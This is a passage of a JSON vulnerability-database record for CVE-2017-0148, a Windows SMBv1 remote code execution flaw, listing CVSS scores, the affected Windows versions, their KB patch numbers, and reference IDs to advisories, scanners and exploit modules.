["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": 
"packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-03-18T19:17:49", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-03-18T19:17:49", "rev": 2}}, "objectVersion": "1.5", "kbList": ["KB4013198", "KB3205401", "KB3177186", "KB3212646", "KB4012214", "KB4012598", "KB3205409", "KBMS16-110, 3187754", "KB3210720", "KB3213986", "KB3210721", "KB4013429", "KB4012215", "KB4012216", "KB4012606", "KB4012217", "KB4012212", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", 
"kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": 
"KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", 
"kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-03-18T19:17:49", "differentElements": ["cvss2", "cvss3"], "edition": 3}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": 
"https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-07-28T20:07:07", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", 
"MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-07-28T20:07:07", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-07-28T20:07:07", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB3212646", "KB4012213", "KB4013429", "KB4012216", "KB3210721", "KB3177186", "KB4012606", "KB4012217", "KBMS16-110, 3187754", "KB4013198", "KB4012598", "KB3210720", "KB4012215", "KB4012212", "KB4012214", "KB3205401", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core 
installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 
8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-07-28T20:07:07", "differentElements": ["msAffectedSoftware"], "edition": 4}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-03T18:46:41", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-03T18:46:41", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-03T18:46:41", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB3210721", "KB4012212", "KB3177186", "KB4012213", "KB4012217", "KBMS16-110, 3187754", 
"KB4012215", "KB3205409", "KB4012606", "KB3210720", "KB4012598", "KB4012216", "KB4013429", "KB4012214", "KB3213986", "KB4013198", "KB3212646"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 